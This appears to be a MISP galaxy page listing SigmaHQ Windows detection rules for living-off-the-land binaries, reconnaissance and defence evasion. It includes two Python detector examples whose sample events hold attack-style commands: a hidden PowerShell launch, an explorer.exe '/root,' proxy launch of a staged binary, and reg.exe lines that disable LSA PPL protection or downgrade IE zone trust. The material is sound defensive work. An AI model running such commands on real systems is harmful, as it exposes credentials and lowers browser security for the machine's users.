The tag is: misp-galaxy:sigma-rules="Renamed Gpg.EXE Execution"

Renamed Gpg.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

Table 11045. Table References

Links

https://securelist.com/locked-out/68960/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_gpg4win.yml

Files And Subdirectories Listing Using Dir

Detects usage of the "dir" command that is part of Windows batch/cmd to collect information about directories

The tag is: misp-galaxy:sigma-rules="Files And Subdirectories Listing Using Dir"

Files And Subdirectories Listing Using Dir has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Information Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

Table 11046. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml

Pubprn.vbs Proxy Execution

Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.

The tag is: misp-galaxy:sigma-rules="Pubprn.vbs Proxy Execution"

Pubprn.vbs Proxy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PubPrn - T1216.001" with estimative-language:likelihood-probability="almost-certain"

Table 11047. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Pubprn/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml

Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell

Detects PowerShell as a child of the WmiPrvSE process, which could be a sign of lateral movement via WMI.

The tag is: misp-galaxy:sigma-rules="Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell"

Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11048. Table References

Links

https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml
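Several entries in this list ("ImagingDevices Unusual Parent/Child Processes", "Explorer Process Tree Break", "Proxy Execution Via Explorer.exe" and the WmiPrvSE rule directly above) are not about a string in one command line but about the shape of the process tree, and the explorer tree break in particular only makes sense once the tree is rebuilt: the launched binary ends up as a child of a fresh explorer.exe under svchost.exe rather than of the shell that started it. The following is an added example written for this page, not code from the Sigma project or from the referenced reports. It rebuilds a tree from constructed Sysmon-style events and evaluates four parent/child conditions; the baseline of expected ImagingDevices.exe parents and the explorer.exe /root, switch are assumptions of this example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    """One process-creation event: enough of Sysmon EID 1 / Security 4688 to rebuild the tree."""
    pid: int
    ppid: int
    image: str
    cmdline: str = ""


POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# Assumed baseline for this example: the Imaging Devices control panel applet is launched from
# the shell and has no children of its own. Tune against your own telemetry before deploying.
IMAGINGDEVICES_EXPECTED_PARENTS = {"explorer.exe"}
# "explorer.exe /root,<path>" makes the shell launch <path>; the switch is the one documented
# by LOLBAS and is an assumption of this example, not text from the page.
EXPLORER_PROXY_RE = re.compile(r'explorer(?:\.exe)?"?\s+/root,', re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name, tolerant of either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def index_events(events):
    """Map pid -> Proc and ppid -> [children] so rules can look both up and down the tree."""
    procs = {p.pid: p for p in events}
    children = {}
    for p in events:
        children.setdefault(p.ppid, []).append(p)
    return procs, children


def parent_name(p, procs):
    parent = procs.get(p.ppid)
    return basename(parent.image) if parent else None


def evaluate(events):
    """Return sorted (rule name, pid) findings for the four parent/child rules."""
    procs, children = index_events(events)
    findings = []
    for p in events:
        name = basename(p.image)
        parent = parent_name(p, procs)
        if name in POWERSHELL_IMAGES and parent == "wmiprvse.exe":
            findings.append(("Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell", p.pid))
        if name == "imagingdevices.exe" and (
                parent not in IMAGINGDEVICES_EXPECTED_PARENTS or children.get(p.pid)):
            findings.append(("ImagingDevices Unusual Parent/Child Processes", p.pid))
        # A fresh explorer.exe under svchost.exe that itself spawns something is the "tree break":
        # the child's parent is this instance, not the shell or script that actually launched it.
        if name == "explorer.exe" and parent == "svchost.exe" and children.get(p.pid):
            findings.append(("Explorer Process Tree Break", p.pid))
        if EXPLORER_PROXY_RE.search(p.cmdline):
            findings.append(("Proxy Execution Via Explorer.exe", p.pid))
    return sorted(findings)


# Constructed sample tree (not taken from any report on the page). pid 4 stands in for System.
SAMPLE_EVENTS = [
    Proc(300, 4, r"C:\Windows\System32\services.exe"),
    Proc(400, 300, r"C:\Windows\System32\svchost.exe", "svchost.exe -k DcomLaunch"),
    Proc(500, 4, r"C:\Windows\System32\winlogon.exe"),
    Proc(600, 500, r"C:\Windows\System32\userinit.exe"),
    Proc(700, 600, r"C:\Windows\explorer.exe", "explorer.exe"),  # the logon shell
    Proc(900, 700, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    Proc(910, 900, r"C:\Windows\explorer.exe", r'explorer.exe /root,"C:\Users\Public\stage.exe"'),
    Proc(950, 400, r"C:\Windows\explorer.exe", "explorer.exe"),  # new instance spawned by svchost
    Proc(960, 950, r"C:\Users\Public\stage.exe", "stage.exe"),  # now hangs off pid 950, not 900
    Proc(1000, 400, r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    Proc(1010, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -nop -w hidden"),
    Proc(1100, 700, r"C:\Windows\System32\ImagingDevices.exe"),  # normal: opened from the shell
    Proc(1200, 1010, r"C:\Windows\System32\ImagingDevices.exe"),  # unusual parent
    Proc(1210, 1200, r"C:\Windows\System32\rundll32.exe"),  # unusual child
]

if __name__ == "__main__":
    for rule, pid in evaluate(SAMPLE_EVENTS):
        print(f"{pid:>5}  {rule}")
```

Note what the tree buys you: the command-line rule fires on pid 910 (the short-lived explorer.exe that carried the /root, switch), while the tree-break rule fires on pid 950, the instance that the payload actually hangs off. An analyst pivoting only from the payload's parent would see svchost.exe and explorer.exe and nothing linking it back to cmd.exe, which is exactly why the original launch command line has to be kept.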

Abusing Print Executable

Detects the use of print.exe to copy a file from a remote location to a local path, a LOLBAS technique for remote file copy

The tag is: misp-galaxy:sigma-rules="Abusing Print Executable"

Abusing Print Executable has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11049. Table References

Links

https://twitter.com/Oddvarmoe/status/985518877076541440

https://lolbas-project.github.io/lolbas/Binaries/Print/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml

Suspicious WindowsTerminal Child Processes

Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)

The tag is: misp-galaxy:sigma-rules="Suspicious WindowsTerminal Child Processes"

Table 11050. Table References

Links

https://persistence-info.github.io/Data/windowsterminalprofile.html

https://twitter.com/nas_bench/status/1550836225652686848

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml

HackTool - Bloodhound/Sharphound Execution

Detects command line parameters used by Bloodhound and Sharphound hack tools

The tag is: misp-galaxy:sigma-rules="HackTool - Bloodhound/Sharphound Execution"

HackTool - Bloodhound/Sharphound Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11051. Table References

Links

https://github.com/BloodHoundAD/SharpHound

https://github.com/BloodHoundAD/BloodHound

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml

Uncommon Extension Shim Database Installation Via Sdbinst.EXE

Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims

The tag is: misp-galaxy:sigma-rules="Uncommon Extension Shim Database Installation Via Sdbinst.EXE"

Uncommon Extension Shim Database Installation Via Sdbinst.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

Table 11052. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_susp_extension.yml

Lolbin Unregmp2.exe Use As Proxy

Detects usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"

The tag is: misp-galaxy:sigma-rules="Lolbin Unregmp2.exe Use As Proxy"

Lolbin Unregmp2.exe Use As Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11053. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml

CMD Shell Output Redirect

Detects the use of the redirection character ">" to redirect command output in the command line

The tag is: misp-galaxy:sigma-rules="CMD Shell Output Redirect"

CMD Shell Output Redirect has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11055. Table References

Links

https://ss64.com/nt/syntax-redirection.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirect.yml

Procdump Execution

Detects usage of the SysInternals Procdump utility

The tag is: misp-galaxy:sigma-rules="Procdump Execution"

Procdump Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 11056. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml

LSA PPL Protection Disabled Via Reg.EXE

Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process

The tag is: misp-galaxy:sigma-rules="LSA PPL Protection Disabled Via Reg.EXE"

LSA PPL Protection Disabled Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Downgrade Attack - T1562.010" with estimative-language:likelihood-probability="almost-certain"

Table 11057. Table References

Links

https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml

PowerShell Download Pattern

Detects a Powershell process that contains download commands in its command line string

The tag is: misp-galaxy:sigma-rules="PowerShell Download Pattern"

PowerShell Download Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11058. Table References

Links

https://hatching.io/blog/powershell-analysis/

https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html

https://lab52.io/blog/winter-vivern-all-summer/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml

Arbitrary File Download Via MSOHTMED.EXE

Detects usage of "MSOHTMED" to download arbitrary files

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via MSOHTMED.EXE"

Arbitrary File Download Via MSOHTMED.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11059. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/238/files

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msohtmed_download.yml

IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI

Detects changes to Internet Explorer’s (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.

The tag is: misp-galaxy:sigma-rules="IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI"

Table 11060. Table References

Links

https://twitter.com/M_haggis/status/1699056847154725107

https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content

https://twitter.com/JAMESWT_MHT/status/1699042827261391247

https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml
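Two of the rules above, "LSA PPL Protection Disabled Via Reg.EXE" and the ZoneMap downgrade directly above, are both detections of a reg.exe command line that writes a specific value, and both need the key, value name and data pulled out of the command line rather than matched as one opaque substring (the ZoneMap key contains a space and is normally quoted; RunAsPPL can be set to 0 or simply deleted). The following is an added example written for this page, not code from the Sigma project; it parses "reg add" / "reg delete" command lines and applies the two checks to constructed samples. The zone identifiers (0 = My Computer, 3 = Internet) are the documented URL security zone values; treating a deletion of RunAsPPL as equivalent to setting it to 0 is this example's own choice.

```python
import re

# URL security zone identifiers used in ZoneMap: 0 = My Computer, 1 = Local intranet,
# 2 = Trusted sites, 3 = Internet, 4 = Restricted sites.
ZONE_MY_COMPUTER = 0

REG_CMD_RE = re.compile(
    r'\breg(?:\.exe)?"?\s+(add|delete)\s+(?:"([^"]+)"|(\S+))(.*)$', re.IGNORECASE | re.DOTALL)
LSA_KEY_RE = re.compile(r'\\(?:CurrentControlSet|ControlSet\d{3})\\Control\\Lsa$', re.IGNORECASE)
ZONEMAP_DEFAULTS_RE = re.compile(r'\\ZoneMap\\ProtocolDefaults$', re.IGNORECASE)


def _option(rest: str, flag: str):
    """Value of a reg.exe switch such as /v or /d; quoted values may contain spaces."""
    m = re.search(r'(?<!\S)' + re.escape(flag) + r'\s+(?:"([^"]*)"|(\S+))', rest, re.IGNORECASE)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def parse_reg_command(cmdline: str):
    """Split a 'reg add'/'reg delete' command line into operation, key and switches."""
    m = REG_CMD_RE.search(cmdline)
    if not m:
        return None
    rest = m.group(4)
    return {
        "op": m.group(1).lower(),
        "key": (m.group(2) or m.group(3)).rstrip("\\"),
        "value": _option(rest, "/v"),
        "type": _option(rest, "/t"),
        "data": _option(rest, "/d"),
        "force": re.search(r'(?<!\S)/f(?!\S)', rest, re.IGNORECASE) is not None,
    }


def _as_int(data):
    """reg.exe accepts decimal or 0x-prefixed hex for REG_DWORD data."""
    if data is None:
        return None
    s = data.strip().lower()
    try:
        return int(s[2:], 16) if s.startswith("0x") else int(s, 10)
    except ValueError:
        return None


def is_lsa_ppl_disable(cmdline: str) -> bool:
    r = parse_reg_command(cmdline)
    if not r or not LSA_KEY_RE.search(r["key"]) or (r["value"] or "").lower() != "runasppl":
        return False
    # Deleting the value or setting it to 0 both leave LSASS unprotected after the next boot.
    return r["op"] == "delete" or _as_int(r["data"]) == 0


def is_zonemap_downgrade(cmdline: str) -> bool:
    r = parse_reg_command(cmdline)
    if not r or r["op"] != "add" or not ZONEMAP_DEFAULTS_RE.search(r["key"]):
        return False
    return (r["value"] or "").lower() in {"http", "https"} and _as_int(r["data"]) == ZONE_MY_COMPUTER


# Constructed sample command lines for this example (not taken from any report on the page).
SAMPLES = {
    "lsa_ppl_disable": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 0 /f',
    "lsa_ppl_delete": r"reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /f",
    "lsa_ppl_enable": r"reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 1 /f",
    "zonemap_http_to_mycomputer": r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
                                  r'\ZoneMap\ProtocolDefaults" /v http /t REG_DWORD /d 0 /f',
    "zonemap_https_internet": r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
                              r'\ZoneMap\ProtocolDefaults" /v https /t REG_DWORD /d 3 /f',
    "unrelated_reg": r"reg add HKCU\Console /v QuickEdit /t REG_DWORD /d 1 /f",
}


def triage(cmdline: str):
    hits = []
    if is_lsa_ppl_disable(cmdline):
        hits.append("LSA PPL Protection Disabled Via Reg.EXE")
    if is_zonemap_downgrade(cmdline):
        hits.append("IE ZoneMap Setting Downgraded To MyComputer Zone")
    return hits


def run_samples():
    return {name: triage(cmd) for name, cmd in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in run_samples().items():
        print(f"{name:<28} {hits or '-'}")
```

A command-line rule of this kind only sees changes made through reg.exe. The same values can be written through the registry API, PowerShell's Set-ItemProperty, or Group Policy, so a Sysmon registry event (EID 13) on the same key and value name is the complementary signal; and note that setting RunAsPPL to 1 (or 2 on builds that support the UEFI-locked variant) is the hardening direction and is deliberately not flagged here.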

Potential WinAPI Calls Via CommandLine

Detects the use of WinAPI functions via the command line, as seen used by threat actors via the tool winapiexec

The tag is: misp-galaxy:sigma-rules="Potential WinAPI Calls Via CommandLine"

Potential WinAPI Calls Via CommandLine has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

Table 11061. Table References

Links

https://twitter.com/m417z/status/1566674631788007425

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_inline_win_api_access.yml

Potential Privilege Escalation Using Symlink Between Osk and Cmd

Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.

The tag is: misp-galaxy:sigma-rules="Potential Privilege Escalation Using Symlink Between Osk and Cmd"

Potential Privilege Escalation Using Symlink Between Osk and Cmd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

Table 11062. Table References

Links

https://ss64.com/nt/mklink.html

https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml

Local Groups Reconnaissance Via Wmic.EXE

Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

The tag is: misp-galaxy:sigma-rules="Local Groups Reconnaissance Via Wmic.EXE"

Local Groups Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 11063. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_group.yml

Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet

Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet

The tag is: misp-galaxy:sigma-rules="Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet"

Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 11064. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml

Uncommon System Information Discovery Via Wmic.EXE

Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.

The tag is: misp-galaxy:sigma-rules="Uncommon System Information Discovery Via Wmic.EXE"

Uncommon System Information Discovery Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11065. Table References

Links

https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior

https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar

https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/

https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/

https://nwgat.ninja/getting-system-information-with-wmic-on-windows/

https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml

Remote File Download Via Findstr.EXE

Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.

The tag is: misp-galaxy:sigma-rules="Remote File Download Via Findstr.EXE"

Remote File Download Via Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11066. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Findstr/

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_download.yml

Java Running with Remote Debugging

Detects a JAVA process running with remote debugging allowing more than just localhost to connect

The tag is: misp-galaxy:sigma-rules="Java Running with Remote Debugging"

Java Running with Remote Debugging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 11067. Table References

Links

https://dzone.com/articles/remote-debugging-java-applications-with-jdwp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_remote_debugging.yml

Python Spawning Pretty TTY on Windows

Detects python spawning a pretty tty

The tag is: misp-galaxy:sigma-rules="Python Spawning Pretty TTY on Windows"

Python Spawning Pretty TTY on Windows has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11068. Table References

Links

https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml

Replace.exe Usage

Detects the use of Replace.exe, which can be used to replace a file with another file

The tag is: misp-galaxy:sigma-rules="Replace.exe Usage"

Replace.exe Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11069. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace

https://lolbas-project.github.io/lolbas/Binaries/Replace/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml

Disabled IE Security Features

Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features

The tag is: misp-galaxy:sigma-rules="Disabled IE Security Features"

Disabled IE Security Features has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11070. Table References

Links

https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_ie_features.yml

Process Proxy Execution Via Squirrel.EXE

Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)

The tag is: misp-galaxy:sigma-rules="Process Proxy Execution Via Squirrel.EXE"

Process Proxy Execution Via Squirrel.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11071. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/

http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/

http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_squirrel_proxy_execution.yml

Indirect Command Execution By Program Compatibility Wizard

Detects indirect command execution via the Program Compatibility Assistant pcwrun.exe

The tag is: misp-galaxy:sigma-rules="Indirect Command Execution By Program Compatibility Wizard"

Indirect Command Execution By Program Compatibility Wizard has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11072. Table References

Links

https://twitter.com/pabraeken/status/991335019833708544

https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml

Tap Installer Execution

Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques

The tag is: misp-galaxy:sigma-rules="Tap Installer Execution"

Tap Installer Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 11073. Table References

Links

https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tapinstall_execution.yml

Suspicious IIS Module Registration

Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors

The tag is: misp-galaxy:sigma-rules="Suspicious IIS Module Registration"

Suspicious IIS Module Registration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="IIS Components - T1505.004" with estimative-language:likelihood-probability="almost-certain"

Table 11074. Table References

Links

https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_susp_module_registration.yml

LOL-Binary Copied From System Directory

Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.

The tag is: misp-galaxy:sigma-rules="LOL-Binary Copied From System Directory"

LOL-Binary Copied From System Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 11075. Table References

Links

https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120

https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/

https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml

Potentially Suspicious Desktop Background Change Using Reg.EXE

Detects the execution of "reg.exe" to alter registry keys that would replace the user’s desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Desktop Background Change Using Reg.EXE"

Potentially Suspicious Desktop Background Change Using Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

